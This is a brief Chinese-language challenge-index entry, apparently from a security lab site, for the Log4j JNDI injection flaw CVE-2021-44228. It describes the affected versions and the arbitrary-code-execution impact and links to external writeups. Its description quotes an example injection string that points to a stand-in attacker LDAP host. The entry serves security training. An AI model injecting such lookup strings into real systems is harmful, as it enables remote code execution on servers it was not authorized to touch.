CVE-2021-44228
| ID: | 16969 |
|---|---|
| 标题: | CVE-2021-44228 |
| 描述: | Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。 |
| 类型: | JNDI 注入漏洞 |
| 网站: | cyberstrikelab |
| 题目链接: | https://www.cyberstrikelab.com/ |
| 赛事: | cyberstrikelab |
| 年度: | 2021 |
| Flag值: | 无 |
| writeup: |
https://blog.csdn.net/kyliuw/article/details/123356395 无 https://blog.csdn.net/qq_43531669/article/details/123562530 无 https://xiaolong22333.top/archives/80/ 无 https://www.cnblogs.com/loongten/p/15822195.html |